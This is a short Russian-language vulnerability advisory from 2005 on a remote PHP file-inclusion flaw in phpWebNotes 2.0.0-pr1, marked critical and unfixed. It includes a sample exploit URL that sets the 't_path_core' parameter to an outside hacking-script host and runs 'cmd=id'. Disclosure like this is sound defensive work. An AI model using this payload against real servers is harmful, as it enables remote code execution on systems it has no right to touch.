PHP-инклюдинг в phpWebNotes

Дата публикации:
30.08.2005
Дата изменения:
30.08.2005
Всего просмотров:
1645
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpWebNotes 2.0.0-pr1

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует при обработке входных данных в параметре 't_path_core' сценария 'php_api.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web севера. Пример:

http://[target]/xxxxx/api.php?t_path_core=
http://pathtohackingscript?&cmd=id

URL производителя: sourceforge.net/projects/webnotes/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: XSS security hole in phpwebnotes

или введите имя

CAPTCHA